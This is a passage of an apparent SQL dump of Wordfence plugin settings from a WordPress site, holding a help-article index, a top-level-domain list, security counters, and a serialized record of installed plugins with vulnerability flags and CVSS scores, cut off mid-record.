('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Free\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-free\\/\",\"excerpt\":\"Wordfence Free is an all-in-one security solution for WordPress websites that includes an endpoint firewall, security scanner, login security, alerts, centralized management, and more.\",\"order\":0},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-premium\\/\",\"excerpt\":\"Wordfence Premium comes with real-time firewall protection, real-time scan signatures, an IP address blocklist, country blocking, and Premium support.\",\"order\":1},{\"title\":\"Wordfence Care\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-care\\/\",\"excerpt\":\"Wordfence Care is for business owners who place a premium on their time. Our team installs, configures, optimizes, and maintains your WordPress site security.\",\"order\":2},{\"title\":\"Wordfence Response\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-response\\/\",\"excerpt\":\"Wordfence Response is for mission-critical WordPress websites that require 24\\/7\\/365 security monitoring with a 1-hour response time and 24-hour remediation.\",\"order\":3},{\"title\":\"Incident Response Services\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/incident-response-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":4},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/api-key\\/\",\"excerpt\":\"All Wordfence installations need a license key, also known as an API-key. The key can be a free key or a Premium key. \",\"order\":5},{\"title\":\"Account and Billing History\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/account\\/\",\"excerpt\":\"How to navigate and use your Wordfence account.\",\"order\":6},{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":4},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":5},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":6},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":7}],\"order\":7},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":8},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":1},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":9},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the firewall rules that protect against various attacks, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":10},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, and shells that hackers have installed. It also scans for known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":11},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Live Traffic analysis, WHOIS Lookup, Import\\/Export Options, and Diagnostics.\",\"children\":[{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":0},{\"title\":\"WHOIS Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":1},{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5}],\"order\":12},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":13},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you will find the answers in this section.\",\"children\":[{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":2},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":3},{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":7}],\"order\":14},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available standard contractual clauses to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":15},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":16}]}','yes'),
('supportHash','08d4ef3548aa03c326050e71582ad95cbc4bc6c477b3dae0893f111949ba1389','yes'),
('timeoffset_wf','0','yes'),
('timeoffset_wf_updated','1691941286','yes'),
('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|aero|akdn|ally|amex|arab|army|arpa|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|cbre|prod|audio|plus|pohl|porn|post|qpon|actor|adult|archi|prof|read|aetna|amfam|apple|reit|rent|rest|rich|room|rsvp|ruhr|safe|sale|sarl|save|saxo|scot|seat|seek|sexy|shaw|shia|amica|shop|show|silk|sina|site|skin|autos|nico|bananarepublic|bing|blog|blue|bofa|bond|book|buzz|baidu|next|bosch|camp|banamex|cafe|news|nike|build|care|norton|barefoot|casa|cash|nowruz|barclays|case|barcelona|name|barclaycard|cars|navy|nowtv|broker|call|office|olayan|ollo|play|azure|beats|bible|bingo|avianca|black|boats|canon|cards|nexus|boston|camera|career|nagoya|natura|nikon|ninja|nissan|nissay|nokia|omega|paris|phone|bayern|bostik|osaka|pars|parts|beauty|open|page|party|berlin|pccw|photo|pfizer|photos|physio|pics|pictet|ping|pink|pizza|bharti|place|bauhaus|poker|praxi|press|promo|online|prime|otsuka|quebec|quest|oracle|orange|reise|rocks|rodeo|racing|bargains|radio|salon|realty|rehab|reisen|repair|report|ricoh|review|sener|seven|rogers|rugby|sakura|sanofi|sharp|shell|rocher|shoes|baseball|ryukyu|basketball|safety|skype|visa|viva|vivo|wien|agakhan|voto|wang|weir|toray|vote|africa|agency|vana|wiki|airbus|airforce|airtel|alibaba|alipay|town|tube|allfinanz|toys|author|total|wine|tours|trust|abogado|yoga|abbvie|trade|zara|tunes|zero|travel|tushu|ubank|video|abbott|toyota|unicom|vegas|yahoo|yachts|yandex|zappos|zone|viajes|abudhabi|work|voyage|wales|watch|works|academy|weber|weibo|webcam|world|walter|accenture|accountant|accountants|viking|vodka|volvo|xbox|xerox|villas|virgin|vision|voting|xihuan|allstate|alsace|alstom|amazon|auspost|amsterdam|analytics|android|anquan|apartments|sncf|sohu|smile|sport|store|tools|aramco|star|stada|auction|audible|spot|athleta|attorney|smart|song|sony|space|associates|sling|solar|style|aquarelle|study|casino|sucks|tech|tokyo|school|schule|today|search|secure|select|teva|tiaa|tips|tires|tmall|shouji|tirol|soccer|team|tatar|social|surf|stream|swiss|talk|americanexpress|studio|supply|sydney|target|tattoo|tienda|tjmaxx|tkmaxx|americanfamily|taipei|taxi|suzuki|swatch|taobao|tennis|bentley|cern|chat|citi|city|club|cool|coop|cyou|data|date|dclk|deal|dell|desi|diet|dish|design|direct|digital|diamonds|directory|discount|discover|docs|dvag|doctor|farm|gbiz|ggee|earth|edeka|fast|food|gent|drive|catholic|fage|ford|dubai|fail|dunlop|dupont|erni|durban|fido|film|fish|flir|free|game|domains|download|fire|education|fans|fund|gift|gmbh|gold|golf|goog|guge|guru|hair|haus|hdfc|help|here|host|delta|datsun|hsbc|deals|degree|hyatt|dealer|hughes|hyundai|icbc|ieee|imdb|info|irish|dentist|joburg|hosting|kddi|ikano|jprs|dental|hotels|immo|hotmail|kids|imamat|intuit|like|loan|love|house|insure|kaufen|limo|live|juegos|link|ismaili|itau|jeep|jetzt|hospital|ipiranga|investments|jaguar|java|democrat|institute|insurance|international|jobs|kiwi|kpmg|land|lego|lgbt|lidl|delivery|juniper|kred|deloitte|immobilien|jpmorgan|industries|jewelry|istanbul|life|infiniti|ltda|epson|faith|fedex|final|forex|forum|gallo|games|gifts|gives|glass|globo|gmail|green|gripe|group|gucci|guide|honda|horse|dating|email|express|etisalat|homes|emerck|energy|engineer|estate|events|expert|exposed|exchange|fairwinds|engineering|eurovision|extraspace|family|feedback|ferrero|giving|farmers|fashion|george|gratis|ferrari|fidelity|gallup|garden|global|finance|firmdale|futbol|financial|health|fishing|equipment|ericsson|fitness|flickr|flights|flowers|frogans|fujitsu|grocery|frontier|godaddy|football|forsale|gallery|genting|goodyear|grainger|furniture|google|graphics|frontdoor|hiphop|guardian|foundation|hdfcbank|helsinki|hermes|fresenius|goldpoint|guitars|hamburg|hangout|firestone|hisamitsu|hockey|holiday|holdings|homedepot|homegoods|homesense|enterprises|luxe|hitachi|kerryhotels|leclerc|healthcare|maif|cisco|citic|crown|claims|credit|monash|money|coupon|mormon|moscow|moto|circle|click|clinic|cloud|coach|codes|coffee|comsec|condos|cruise|bestbuy|chanel|chase|booking|brother|brussels|cheap|broadway|bnpparibas|museum|boehringer|capital|center|clubmed|cymru|careers|charity|cooking|bradesco|channel|boutique|netbank|builders|business|capetown|chrome|church|calvinklein|caravan|catering|chintai|citadel|cipriani|cleaning|college|dabur|blackfriday|cologne|comcast|dance|company|contact|florist|cityeats|blockbuster|compare|bloomberg|christmas|clinique|capitalone|network|windows|xfinity|clothing|movie|neustar|winners|commbank|courses|computer|netflix|community|cricket|cruises|xn--90ais|xn--c1avg|xn--d1alf|xn--e1a4c|xn--fhbei|consulting|corsica|country|coupons|monster|xn--90ae|creditcard|mortgage|cuisinella|woodside|nextdirect|xn--30rr7y|xn--3pxu8k|xn--45q11c|xn--4gbrim|xn--55qx5d|xn--5tzm5g|xn--80aswg|xn--90a3ac|xn--9dbq2a|xn--9et52u|xn--c2br7g|xn--cg4bki|xn--czrs0t|xn--czru2d|bridgestone|contractors|creditunion|motorcycles|williamhill|xn--fiq64b|xn--p1ai|xn--p1acf|xn--qxa6a|xn--pssy2u|xn--q7ce6a|xn--11b4c3d|xn--1ck2e1b|xn--o3cw4h|xn--1qqw23a|xn--nqv7f|xn--2scrj9c|xn--node|xn--3bst00m|xn--3ds443g|xn--nyqy26a|xn--otu796d|xn--3e0b707e|xn--3hcrj9c|xn--ngbrx|xn--42c2d9a|xn--pgbs0dh|xn--q9jyb4c|xn--qxam|xn--45brj9c|xn--vhquv|yamaxun|youtube|zuerich|yokohama|yodobashi|wolterskluwer|xn--fiqs8s|xn--unup4y|xn--rhqv96g|xn--tckwe|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--vuq861b|xn--w4rs40l|xn--wgbl6a|xn--xhq521b|xn--y9a3aq|xn--zfr164b|construction|xn--rovu88b|xn--wgbh1c|xn--45br5cyl|xn--9krt00a|xn--4dbrk0ce|xn--j1aef|xn--io0a7i|xn--cck2b3b|xn--cckwcxetd|xn--czr694b|xn--d1acj3b|xn--efvy88h|xn--fct429k|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fzc2c9e2c|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--fpcrj9c3d|xn--gk3at1e|xn--h2brj9c|xn--eckvdtc9d|xn--h2brj9c8c|xn--hxt814e|xn--imr513n|xn--j1amh|xn--6frz82g|xn--j6w193g|xn--jvr189m|xn--kprw13d|xn--kpry57d|xn--8y0a063a|xn--kput3i|xn--l1acc|xn--mxtq1m|xn--55qw42g|xn--80ao21a|xn--80adxhks|xn--80asehdb|xn--mgb9awbf|xn--mgbtx2b|xn--mix891f|xn--mgbab2bd|xn--mgbbh1a|xn--mgbgu82a|xn--mgbpl2fh|xn--mgbt3dhd|xn--mk1bu44c|xn--ngbc5azd|xn--ngbe9e0a|xn--ogbpf8fl|xn--qcka1pmc|xn--tiq49xqyj|xn--yfro4i67o|xn--ygbi2ammx|kerrylogistics|moda|legal|lipsy|kinder|kindle|koeln|lamer|lexus|lilly|kosher|kyoto|lease|loans|locus|lotte|lotto|media|latino|lasalle|lawyer|lanxess|lefrak|lincoln|kerryproperties|kitchen|komatsu|kuokgroup|lacaixa|latrobe|lighting|limited|lamborghini|lancaster|landrover|lifestyle|lifeinsurance|mango|living|meet|meme|mint|miami|mini|mobi|music|locker|london|menu|luxury|madrid|maison|makeup|market|mattel|organic|origins|pioneer|politie|realtor|merckmsd|mobile|markets|okinawa|oldnavy|philips|recipes|rentals|reviews|rexroth|samsung|sandvik|schmidt|schwarz|science|shiksha|singles|staples|storage|support|observer|redstone|redumbrella|surgery|olayangroup|software|theater|microsoft|systems|softbank|temasek|mitsubishi|saarland|theatre|tickets|toshiba|reliance|statefarm|supplies|verisign|solutions|ventures|statebank|stockholm|republican|richardli|restaurant|stcgroup|trading|versicherung|walmart|wanggou|watches|weather|website|wedding|vlaanderen|whoswho|lundbeck|partners|marketing|mckinsey|plumbing|marshalls|management|marriott|pictures|training|melbourne|memorial|panasonic|pharmacy|pramerica|shangrila|travelers|playstation|security|university|photography|productions|lplfinancial|property|samsclub|showtime|realestate|sandvikcoromant|shopping|schaeffler|services|vanguard|tatamotors|vacations|properties|protection|prudential|technology|progressive|scholarships|volkswagen|weatherchannel|xn--54b7fta0cc|xn--i1b6b1a6a2e|xn--mgbc0a9azcg|xn--5su34j936bgsg|xn--6qq986b3xl|xn--80aqecdr1a|travelersinsurance|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--jlq480n2rg|xn--kcrx77d1x4a|xn--lgbbat1ad8j|xn--clchc0ea0b2g2a9gcd|xn--fiq228c5hs|xn--h2breg3eve|xn--fzys8d69uvgm|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaam7a8h|xn--mgberp4a5d4ar|xn--nqv7fs00ema|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgbaakc7dvf|xn--mgbcpq6gpa1a|xn--mgbi4ecexp|xn--mgbx4cd0ab|xn--rvc1e0am3e|xn--w4r85el8fhu5dnra|xn--vermgensberater-ctb|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--vermgensberatung-pwb|','yes'),
('tldlistHash','e9cfe20c75c0d687c8a40858930bb554a63640820df54780d53abc780b46a9f4','yes'),
('total503s','10','yes'),
('totalIPsBlocked','10','yes'),
('totalLoginHits','98','yes'),
('totalScansRun','1','yes'),
('touppBypassNextCheck','0','yes'),
('touppPromptNeeded','0','yes'),
('vulnerabilities_plugin','a:35:{i:0;a:5:{s:4:\"slug\";s:20:\"advanced-backgrounds\";s:11:\"fromVersion\";s:6:\"1.10.0\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:6:\"1.11.4\";s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:14:\"contact-form-7\";s:11:\"fromVersion\";s:7:\"5.7.5.1\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:3:\"5.8\";s:4:\"link\";b:0;}i:2;a:7:{s:4:\"slug\";s:9:\"elementor\";s:11:\"fromVersion\";s:6:\"3.12.0\";s:10:\"vulnerable\";b:1;s:9:\"toVersion\";s:6:\"3.15.2\";s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/a7bd173c-dc61-4cc6-b42f-311acf728080?source=plugin\";s:5:\"score\";s:4:\"6.60\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\";}i:3;a:5:{s:4:\"slug\";s:20:\"olympus-google-fonts\";s:11:\"fromVersion\";s:5:\"3.3.7\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:5:\"3.4.3\";s:4:\"link\";b:0;}i:4;a:7:{s:4:\"slug\";s:4:\"give\";s:11:\"fromVersion\";s:6:\"2.25.3\";s:10:\"vulnerable\";b:1;s:9:\"toVersion\";s:6:\"2.32.0\";s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/7fa8c406-e64d-4093-a102-436ecfb7dd76?source=plugin\";s:5:\"score\";s:4:\"6.60\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\";}i:5;a:7:{s:4:\"slug\";s:18:\"add-search-to-menu\";s:11:\"fromVersion\";s:3:\"5.5\";s:10:\"vulnerable\";b:1;s:9:\"toVersion\";s:5:\"5.5.2\";s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/5253fe2b-040b-417c-b257-0cb59ee5aa6e?source=plugin\";s:5:\"score\";s:4:\"6.10\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\";}i:6;a:7:{s:4:\"slug\";s:18:\"add-search-to-menu\";s:11:\"fromVersion\";s:3:\"5.5\";s:10:\"vulnerable\";b:1;s:9:\"toVersion\";s:5:\"5.5.2\";s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/5253fe2b-040b-417c-b257-0cb59ee5aa6e?source=plugin\";s:5:\"score\";s:4:\"6.10\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\";}i:7;a:5:{s:4:\"slug\";s:15:\"protect-uploads\";s:11:\"fromVersion\";s:3:\"0.4\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:5:\"0.5.2\";s:4:\"link\";b:0;}i:8;a:5:{s:4:\"slug\";s:15:\"google-site-kit\";s:11:\"fromVersion\";s:6:\"1.96.0\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:7:\"1.106.0\";s:4:\"link\";b:0;}i:9;a:5:{s:4:\"slug\";s:15:\"white-label-cms\";s:11:\"fromVersion\";s:3:\"2.5\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:3:\"2.6\";s:4:\"link\";b:0;}i:10;a:5:{s:4:\"slug\";s:15:\"wp-file-manager\";s:11:\"fromVersion\";s:5:\"7.1.8\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:5:\"7.1.9\";s:4:\"link\";b:0;}i:11;a:4:{s:4:\"slug\";s:8:\"androapp\";s:11:\"fromVersion\";s:5:\"25.03\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:12;a:4:{s:4:\"slug\";s:14:\"classic-editor\";s:11:\"fromVersion\";s:5:\"1.6.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:13;a:4:{s:4:\"slug\";s:11:\"coming-soon\";s:11:\"fromVersion\";s:9:\"6.15.13.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:14;a:4:{s:4:\"slug\";s:17:\"disable-gutenberg\";s:11:\"fromVersion\";s:3:\"3.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:15;a:4:{s:4:\"slug\";s:17:\"easy-google-fonts\";s:11:\"fromVersion\";s:5:\"2.0.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:16;a:4:{s:4:\"slug\";s:30:\"google-analytics-for-wordpress\";s:11:\"fromVersion\";s:4:\"8.18\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:17;a:4:{s:4:\"slug\";s:16:\"mighty-pros-cons\";s:11:\"fromVersion\";s:5:\"1.2.6\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:18;a:4:{s:4:\"slug\";s:12:\"optinmonster\";s:11:\"fromVersion\";s:6:\"2.13.7\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:19;a:4:{s:4:\"slug\";s:12:\"pdf-embedder\";s:11:\"fromVersion\";s:5:\"4.6.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:20;a:4:{s:4:\"slug\";s:11:\"linkpreview\";s:11:\"fromVersion\";s:5:\"1.6.7\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:21;a:4:{s:4:\"slug\";s:11:\"rafflepress\";s:11:\"fromVersion\";s:6:\"1.11.4\";s:10:\"vulnerable\";b:0;s:4:\"l